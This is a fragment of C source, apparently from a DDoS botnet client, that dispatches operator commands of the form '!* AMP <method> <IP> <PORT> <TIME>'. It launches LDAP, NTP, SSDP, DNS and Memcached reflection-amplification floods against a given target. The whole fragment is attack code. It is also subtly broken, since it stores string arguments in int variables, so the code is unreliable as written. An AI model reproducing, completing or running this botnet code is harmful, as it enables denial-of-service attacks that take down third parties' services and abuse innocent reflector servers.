            if(!strcmp(argv[0], "AMP"))
        {
                // !* AMP LDAP <IP> <PORT> <TIME>
                if(!strcmp(argv[1], "LDAP"))
                {
                        if(argc != 5)
                        {
                            return;
                        }
                        int ip = argv[2];
                        int port = argv[3];
                        int time = argv[4];
                        vex("LDAP", ip, port, time);
                }
                // !* AMP NTP <IP> <PORT> <TIME>
                if(!strcmp(argv[1], "NTP"))
                {
                        if(argc != 5)
                        {
                            return;
                        }
                        int ip = argv[2];
                        int port = argv[3];
                        int time = argv[4];
                        vex("NTP", ip, port, time);
                }
                // !* AMP SSDP <IP> <PORT> <TIME>
                if(!strcmp(argv[1], "SSDP"))
                {
                        if(argc != 5)
                        {
                            return;
                        }
                        int ip = argv[2];
                        int port = argv[3];
                        int time = argv[4];
                        vex("SSDP", ip, port, time);
                }
                // !* AMP LDAPV2 <IP> <PORT> <TIME>
                if(!strcmp(argv[1], "LDAPV2"))
                {
                        if(argc != 5)
                        {
                            return;
                        }
                        int ip = argv[2];
                        int port = argv[3];
                        int time = argv[4];
                        vex("LDAPV2", ip, port, time);
                }
                // !* AMP DNS <IP> <PORT> <TIME>
                if(!strcmp(argv[1], "DNS"))
                {
                        if(argc != 5)
                        {
                            return;
                        }
                        int ip = argv[2];
                        int port = argv[3];
                        int time = argv[4];
                        vex("DNS", ip, port, time);
                }
                // !* AMP MEMCACHE <IP> <PORT> <TIME>
                if(!strcmp(argv[1], "MEMCACHE"))
                {
                        if(argc != 5)
                        {
                            return;
                        }
                        int ip = argv[2];
                        int port = argv[3];
                        int time = argv[4];
                        vex("MEMCACHE", ip, port, time);
                }
        }
